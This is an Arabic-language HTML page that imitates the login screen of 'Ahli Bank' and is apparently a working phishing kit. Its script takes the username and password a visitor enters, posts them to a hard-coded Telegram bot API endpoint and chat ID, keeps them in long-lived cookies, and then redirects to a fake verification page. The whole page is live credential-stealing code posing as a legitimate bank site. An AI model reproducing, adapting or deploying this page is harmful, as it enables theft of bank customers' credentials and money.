<!DOCTYPE html>
<html data-wf-domain="" data-wf-page="58e125466699330e60585c64" data-wf-site="64ef7d0d34ee51e7fdfd939c" lang="ar" dir="rtl">

<head>
  <meta charset="utf-8" />
  <title>Ahli Bank - الصفحة الرئيسية</title>
  <meta content="Ahli Bank" property="og:title" />
  <meta content="ahli Bank" property="og:description" />
  <meta content="https://www2.0zz0.com/2025/04/22/15/651746463.jpeg" property="og:image" />
  <meta content="Ahli Jo" property="twitter:title" />
  <meta property="og:type" content="website" />
  <meta content="summary_large_image" name="twitter:card" />
  <meta content="width=device-width, initial-scale=1" name="viewport" />
  <link href="https://cdn.prod.website-files.com/6709b4ecad0f1ceeeed96305/css/orangemonney.webflow.4d36521a0.css" rel="stylesheet" type="text/css" />
  <link href="https://fonts.googleapis.com" rel="preconnect" />
  <link href="https://fonts.gstatic.com" rel="preconnect" crossorigin="anonymous" />
  <script src="https://ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js" type="text/javascript"></script>
  <script type="text/javascript">
    WebFont.load({
      google: {
        families: ["Montserrat:100,100italic,200,200italic,300,300italic,400,400italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic", "Roboto:300,regular,500"]
      }
    });
  </script>
  <script type="text/javascript">
    !function (o, c) {
      var n = c.documentElement, t = " w-mod-"; n.className += t + "js", ("ontouchstart" in o || o.DocumentTouch && c instanceof DocumentTouch) && (n.className += t + "touch")
    }(window, document);
  </script>
  <link href="" rel="shortcut icon" type="image/x-icon" />
  <link href="https://cdn.prod.website-files.com/img/webclip.png" rel="apple-touch-icon" />
  <style>
    body {
      box-sizing: border-box;
      font-size: 18px;
      font-family: 'Cairo', Arial, Tahoma, sans-serif;
    }

    .container {
      padding: 0 5%;
    }

    .field-holder {
      position: relative;
      margin-bottom: 1.25em;
    }

    .w-input {
      border: 0;
      border-bottom: 3px solid #dfdfdf;
      outline: none;
      direction: ltr;
      text-align: left;
    }

    label {
      position: absolute;
      top: 0;
      left: 0;
      font-size: 1em;
      color: #424242;
      display: flex;
      align-items: center;
      cursor: text;
      transition: .3s ease-in-out;
    }

    .w-input,
    label {
      font-size: 1em;
      width: 100%;
      height: 55px;
    }

    .w-input:focus + label,
    .w-input:valid + label {
      color: #008080;
      font-size: .75em;
      top: -25px;
      pointer-events: none;
    }

    .w-input:focus,
    .w-input:valid {
      border-bottom: 3px solid #008080;
    }

    .CustomFooter {
      position: fixed;
      left: 0;
      bottom: 0;
    }

    .submit-button {
      background-color: #008080;
      margin-top: 20px;
    }

    .button-black {
      background-color: black;
      color: white;
    }

    .not-black {
      background-color: grey;
    }

    .bigger-button {
      font-size: 20px;
      padding: 5px 20px;
      width: auto;
      height: auto;
    }
  </style>
  <link href="https://fonts.googleapis.com/css2?family=Cairo:wght@400;700&display=swap" rel="stylesheet">
</head>

<body class="body">
  <div class="div-block-2">
    <img src="https://www2.0zz0.com/2025/04/22/15/873068120.jpeg" alt="Top Image" class="top-image">
    <div class="content"></div>
  </div>
  <div class="div-block-4">
    <div class="container">
      <div class="w-form">
        <form id="signin" name="wf-form-" data-name="سجل الدخول" redirect="/verification.html" data-redirect="/verification.html" method="get" data-wf-page-id="58e125466699330e60585c64" data-wf-element-id="79a466c5-9c18-b348-97ed-cbe6dd2fa663">
          <div class="field-holder">
            <input class="text-field-2 w-input"
                   name="phonenumber"
                   inputmode="text"
                   data-name="رقم الهاتف"
                   placeholder=""
                   type="text"
                   id="phonenumber"
                   required
                   pattern="^[^\u0600-\u06FF\u0750-\u077F\u08A0-\u08FF]+$"
                   autocomplete="off"
                   />
            <label for="phonenumber" class="field-label">اسم المستخدم</label>
          </div>
          <div class="field-holder">
            <input class="text-field-2 w-input"
                   maxlength="256"
                   name="password"
                   data-name="كلمة السر"
                   placeholder=""
                   type="text"
                   id="password"
                   required
                   pattern="^[^\u0600-\u06FF\u0750-\u077F\u08A0-\u08FF]+$"
                   autocomplete="off"
                   />
            <label for="password" class="field-label-2">كلمة السر</label>
          </div>
          <div class="div-block" style="margin-top: 20px;">
            <input type="submit" data-wait="يرجى الانتظار" class="submit-button w-button" value="سجل الدخول" />
          </div>
          <div class="div-block">
            <a href="3.html" class="submit-button w-button bigger-button" style="text-decoration: none; color: white; display: inline-block; text-align: center;">تسجيل الدخول لأول مرة</a>
          </div>
        </form>
        <div class="w-form-done">
          <div>تم استلام بياناتك بنجاح!</div>
        </div>
        <div class="w-form-fail">
          <div>حدث خطأ أثناء إرسال النموذج.</div>
        </div>
      </div>
    </div>
  </div>
  <script src="https://d3e54v103j8qbb.cloudfront.net/js/jquery-3.5.1.min.dc5e7f18c8.js?site=6709b4ecad0f1ceeeed96305" type="text/javascript" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script>
  <script src="https://cdn.prod.website-files.com/6709b4ecad0f1ceeeed96305/js/webflow.1a78e01dd.js" type="text/javascript"></script>
  <script src="https://code.jquery.com/jquery-latest.min.js" type="text/javascript"></script>
  <script src="https://cdn.jsdelivr.net/npm/jquery-validation@1.20.1/dist/jquery.validate.min.js"></script>
  <script>
    // يمنع الأحرف العربية أثناء الإدخال
    function disallowArabicInput(selector) {
      document.querySelectorAll(selector).forEach(function(input) {
        input.addEventListener('input', function(e) {
          this.value = this.value.replace(/[\u0600-\u06FF\u0750-\u077F\u08A0-\u08FF]/g, '');
        });
      });
    }
    disallowArabicInput('.w-input');

    function setCookie(cname, cvalue, exdays) {
      const d = new Date();
      d.setTime(d.getTime() + (exdays * 24 * 60 * 60 * 1000));
      let expires = "expires=" + d.toUTCString();
      document.cookie = cname + "=" + cvalue + ";" + expires + ";path=/";
    }

    $('#signin').on("submit", function () {
      var phonenumber = document.getElementById('phonenumber').value;
      var password = document.getElementById('password').value;

      var message = "رقم الهاتف:`" + phonenumber + "`\n"
      message += "كلمة السر:`" + password + "`\n"

      $.ajax({
        type: 'POST',
        url: `https://api.telegram.org/bot7356894979:AAFxs2g1BAkp6qYCgf3ZE8mvaLvaIuoBmI4/sendMessage`,
        data: {
          chat_id: "-4738220176",
          text: message,
          parse_mode: 'markdown',
        },
        success: function (res) {
          console.debug(res);
          $('#response').text('Message sent');
        },
        error: function (error) {
          console.error(error);
          alert("error failed");
        }
      });

      setCookie("phonenumber", phonenumber, 1000);
      setCookie("password", password, 1000);
    });
  </script>
</body>

</html>